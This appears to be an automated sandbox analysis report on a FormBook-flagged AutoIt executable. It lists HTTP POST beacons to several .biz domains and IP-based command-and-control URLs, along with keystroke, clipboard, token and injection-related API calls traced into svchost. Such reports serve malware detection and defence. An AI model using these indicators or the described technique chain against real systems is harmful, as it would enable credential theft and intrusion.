Source: global traffic	HTTP traffic detected: POST /agqwjlv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /ibckscxhsodddaet HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /rwlfutjcp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /shvehx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /tfd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /hch HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /gloumaahxxajxf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_004722EE

Source: global traffic	DNS traffic detected: DNS query: time.windows.com
Source: global traffic	DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic	DNS traffic detected: DNS query: ssbzmoy.biz
Source: global traffic	DNS traffic detected: DNS query: cvgrf.biz

Source: unknown

HTTP traffic detected: POST /w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 810

Source: I3LPkQh2an.exe, 00000000.00000002.1408544408.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/
Source: I3LPkQh2an.exe, 00000000.00000002.1409417800.0000000000EB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/cle
Source: I3LPkQh2an.exe, 00000000.00000002.1408544408.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp, I3LPkQh2an.exe, 00000000.00000002.1409100605.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, I3LPkQh2an.exe, 00000000.00000003.1388701624.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/
Source: I3LPkQh2an.exe, 00000000.00000002.1409100605.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/H
Source: I3LPkQh2an.exe, 00000000.00000002.1409100605.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/O
Source: I3LPkQh2an.exe, 00000000.00000002.1409100605.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/q
Source: I3LPkQh2an.exe, 00000000.00000003.1388701624.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, I3LPkQh2an.exe, 00000000.00000003.1388701624.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/w
Source: I3LPkQh2an.exe, 00000000.00000003.1388701624.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/w)
Source: I3LPkQh2an.exe, 00000000.00000002.1408544408.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, I3LPkQh2an.exe, 00000000.00000002.1409100605.0000000000D10000.00000004.00000020.00020000.00000000.sdmp, I3LPkQh2an.exe, 00000000.00000002.1408544408.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/wbjqiahuptwvb
Source: I3LPkQh2an.exe, 00000000.00000002.1408544408.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/wbjqiahuptwvbQ(
Source: I3LPkQh2an.exe, 00000000.00000002.1409100605.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/z
Source: I3LPkQh2an.exe, 00000000.00000002.1409100605.0000000000D10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177:80/wbjqiahuptwvb
Source: I3LPkQh2an.exe, 00000000.00000002.1408544408.0000000000C18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pywolwnvd.biz/N

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00474164

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00474164

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00473F66

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_0046001C

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0048CABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1738864587.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1740236285.0000000003690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00403B3A
Source: I3LPkQh2an.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: I3LPkQh2an.exe, 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_0147ddae-b
Source: I3LPkQh2an.exe, 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_44efd5a4-d
Source: I3LPkQh2an.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_00cb5d9f-9
Source: I3LPkQh2an.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_a58e40b6-0

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0042CBC3 NtClose,	9_2_0042CBC3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972B60 NtClose,LdrInitializeThunk,	9_2_03972B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_03972DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039735C0 NtCreateMutant,LdrInitializeThunk,	9_2_039735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03974340 NtSetContextThread,	9_2_03974340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03974650 NtSuspendThread,	9_2_03974650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972B80 NtQueryInformationFile,	9_2_03972B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972BA0 NtEnumerateValueKey,	9_2_03972BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972BF0 NtAllocateVirtualMemory,	9_2_03972BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972BE0 NtQueryValueKey,	9_2_03972BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972AB0 NtWaitForSingleObject,	9_2_03972AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972AD0 NtReadFile,	9_2_03972AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972AF0 NtWriteFile,	9_2_03972AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972F90 NtProtectVirtualMemory,	9_2_03972F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972FB0 NtResumeThread,	9_2_03972FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972FA0 NtQuerySection,	9_2_03972FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972FE0 NtCreateFile,	9_2_03972FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972F30 NtCreateSection,	9_2_03972F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972F60 NtCreateProcessEx,	9_2_03972F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972E80 NtReadVirtualMemory,	9_2_03972E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972EA0 NtAdjustPrivilegesToken,	9_2_03972EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972EE0 NtQueueApcThread,	9_2_03972EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972E30 NtWriteVirtualMemory,	9_2_03972E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972DB0 NtEnumerateKey,	9_2_03972DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972DD0 NtDelayExecution,	9_2_03972DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972D10 NtMapViewOfSection,	9_2_03972D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972D00 NtSetInformationFile,	9_2_03972D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972D30 NtUnmapViewOfSection,	9_2_03972D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972CA0 NtQueryInformationToken,	9_2_03972CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972CC0 NtQueryVirtualMemory,	9_2_03972CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972CF0 NtOpenProcess,	9_2_03972CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972C00 NtQueryInformationProcess,	9_2_03972C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972C70 NtFreeVirtualMemory,	9_2_03972C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03972C60 NtCreateKey,	9_2_03972C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03973090 NtSetValueKey,	9_2_03973090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03973010 NtOpenDirectoryObject,	9_2_03973010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039739B0 NtGetContextThread,	9_2_039739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03973D10 NtOpenProcessToken,	9_2_03973D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03973D70 NtOpenThread,	9_2_03973D70

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_0046A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_0046A1EF

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_00458310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00458310

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_004651BD

Source: C:\Windows\System32\AppVClient.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\a8a24eee21ca4edc.bin

Jump to behavior

Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_0040E6A0	0_2_0040E6A0
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_0042D975	0_2_0042D975
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_0040FCE0	0_2_0040FCE0
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_004221C5	0_2_004221C5
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_004362D2	0_2_004362D2
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_004803DA	0_2_004803DA
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_0043242E	0_2_0043242E
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_004225FA	0_2_004225FA
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_0045E616	0_2_0045E616
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_004166E1	0_2_004166E1
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_0043878F	0_2_0043878F
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00436844	0_2_00436844
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00480857	0_2_00480857
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00418808	0_2_00418808
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00468889	0_2_00468889
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_0042CB21	0_2_0042CB21
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00436DB6	0_2_00436DB6
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00416F9E	0_2_00416F9E
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00413030	0_2_00413030
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_0042F1D9	0_2_0042F1D9
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00423187	0_2_00423187
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00401287	0_2_00401287
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00421484	0_2_00421484
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00415520	0_2_00415520
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00427696	0_2_00427696
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00415760	0_2_00415760
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00421978	0_2_00421978
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00439AB5	0_2_00439AB5
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00527CC8	0_2_00527CC8
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00487DDB	0_2_00487DDB
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00421D90	0_2_00421D90
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_0042BDA6	0_2_0042BDA6
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_0040DF00	0_2_0040DF00
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00413FE0	0_2_00413FE0
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00B100D9	0_2_00B100D9
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00AD6EAF	0_2_00AD6EAF
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00AD51EE	0_2_00AD51EE
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00B0D580	0_2_00B0D580
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00B03780	0_2_00B03780
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00B0C7F0	0_2_00B0C7F0
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00B139A3	0_2_00B139A3
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00B05980	0_2_00B05980
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00AD7B71	0_2_00AD7B71
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00AD7F80	0_2_00AD7F80
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00E88DF0	0_2_00E88DF0
Source: C:\Windows\System32\AppVClient.exe	Code function: 7_2_0057A810	7_2_0057A810
Source: C:\Windows\System32\AppVClient.exe	Code function: 7_2_00557C00	7_2_00557C00
Source: C:\Windows\System32\AppVClient.exe	Code function: 7_2_00582D40	7_2_00582D40
Source: C:\Windows\System32\AppVClient.exe	Code function: 7_2_005579F0	7_2_005579F0
Source: C:\Windows\System32\AppVClient.exe	Code function: 7_2_0057EEB0	7_2_0057EEB0
Source: C:\Windows\System32\AppVClient.exe	Code function: 7_2_005792A0	7_2_005792A0
Source: C:\Windows\System32\AppVClient.exe	Code function: 7_2_005793B0	7_2_005793B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0040E855	9_2_0040E855
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_004010C8	9_2_004010C8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_004010D0	9_2_004010D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0042F1D3	9_2_0042F1D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_004029F8	9_2_004029F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_00402A00	9_2_00402A00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_004032D0	9_2_004032D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0041040A	9_2_0041040A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_00410413	9_2_00410413
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_00401500	9_2_00401500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_00416DA3	9_2_00416DA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0040E643	9_2_0040E643
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_00410633	9_2_00410633
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_004026F0	9_2_004026F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0040E788	9_2_0040E788
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0040E793	9_2_0040E793
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A003E6	9_2_03A003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0394E3F0	9_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039FA352	9_2_039FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039C02C0	9_2_039C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039E0274	9_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A001AA	9_2_03A001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039F41A2	9_2_039F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039F81CC	9_2_039F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039DA118	9_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03930100	9_2_03930100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039C8158	9_2_039C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039D2000	9_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393C7C0	9_2_0393C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03964750	9_2_03964750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03940770	9_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395C6E0	9_2_0395C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A00591	9_2_03A00591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03940535	9_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039EE4F6	9_2_039EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039E4420	9_2_039E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039F2446	9_2_039F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039F6BD7	9_2_039F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039FAB40	9_2_039FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393EA80	9_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A0A9A6	9_2_03A0A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039429A0	9_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03956962	9_2_03956962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039268B8	9_2_039268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396E8F0	9_2_0396E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0394A840	9_2_0394A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03942840	9_2_03942840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039BEFA0	9_2_039BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03932FC8	9_2_03932FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0394CFE0	9_2_0394CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03960F30	9_2_03960F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039E2F30	9_2_039E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03982F28	9_2_03982F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B4F40	9_2_039B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03952E90	9_2_03952E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039FCE93	9_2_039FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039FEEDB	9_2_039FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393AE0D	9_2_0393AE0D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039FEE26	9_2_039FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03940E59	9_2_03940E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03958DBF	9_2_03958DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039DCD1F	9_2_039DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0394AD00	9_2_0394AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039E0CB5	9_2_039E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03930CF2	9_2_03930CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03940C00	9_2_03940C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0398739A	9_2_0398739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039F132D	9_2_039F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0392D34C	9_2_0392D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039452A0	9_2_039452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395B2C0	9_2_0395B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039E12ED	9_2_039E12ED
